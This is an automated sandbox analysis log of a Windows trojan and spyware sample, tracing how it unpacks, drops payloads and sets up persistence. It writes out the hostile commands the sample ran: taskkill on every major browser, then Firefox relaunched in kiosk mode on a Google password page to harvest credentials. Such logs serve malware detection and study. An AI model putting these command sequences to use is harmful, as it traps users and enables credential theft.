Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06422B86 13_2_06422B86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064153AB 13_2_064153AB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EDBD5 13_2_063EDBD5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064123B8 13_2_064123B8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642DBB8 13_2_0642DBB8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EE033 13_2_063EE033
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E981B 13_2_063E981B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06405065 13_2_06405065
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EC80F 13_2_063EC80F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ED80F 13_2_063ED80F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FA00E 13_2_063FA00E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EF802 13_2_063EF802
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640C87D 13_2_0640C87D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641C806 13_2_0641C806
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640580C 13_2_0640580C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0643083B 13_2_0643083B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064228C6 13_2_064228C6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064218C9 13_2_064218C9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064290F1 13_2_064290F1
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06429883 13_2_06429883
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642B883 13_2_0642B883
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F48F8 13_2_063F48F8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06402888 13_2_06402888
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E88F2 13_2_063E88F2
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641008F 13_2_0641008F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F28E2 13_2_063F28E2
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641709E 13_2_0641709E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064068A0 13_2_064068A0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EF0DD 13_2_063EF0DD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641B8A6 13_2_0641B8A6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641F0BB 13_2_0641F0BB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064210BD 13_2_064210BD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06404147 13_2_06404147
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06428149 13_2_06428149
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640214E 13_2_0640214E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06410950 13_2_06410950
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640B158 13_2_0640B158
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640A95E 13_2_0640A95E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EE91E 13_2_063EE91E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06419165 13_2_06419165
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06420173 13_2_06420173
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642D173 13_2_0642D173
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FD161 13_2_063FD161
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06403927 13_2_06403927
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F2157 13_2_063F2157
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F114B 13_2_063F114B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064081D0 13_2_064081D0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064349DA 13_2_064349DA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641A9E4 13_2_0641A9E4
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E698E 13_2_063E698E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F3187 13_2_063F3187
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06407998 13_2_06407998
One or more processes crash
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SxQyhJr[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SxQyhJr.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9978499659400545
Source: file.exe Static PE information: Section: egarwnqv ZLIB complexity 0.99483142788319
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9978499659400545
Source: skotes.exe.0.dr Static PE information: Section: egarwnqv ZLIB complexity 0.99483142788319
Source: random[2].exe.6.dr Static PE information: Section: jyijtabb ZLIB complexity 0.9941472364245416
Source: 98a7b9f337.exe.6.dr Static PE information: Section: jyijtabb ZLIB complexity 0.9941472364245416
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9975065104166667
Source: random[1].exe.6.dr Static PE information: Section: bioduybg ZLIB complexity 0.9947613765105741
Source: a6f0d09f38.exe.6.dr Static PE information: Section: ZLIB complexity 0.9975065104166667
Source: a6f0d09f38.exe.6.dr Static PE information: Section: bioduybg ZLIB complexity 0.9947613765105741
Source: random[1].exe0.6.dr Static PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432
Source: b5da647ae3.exe.6.dr Static PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432
Source: random[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: a6f0d09f38.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@53/34@58/16
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;Fy6
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;-
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9'
Source: a6f0d09f38.exe, 0000000D.00000003.2574863840.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574229742.0000000005BB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);
Source: file.exe Virustotal: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: a6f0d09f38.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: a6f0d09f38.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: b5da647ae3.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
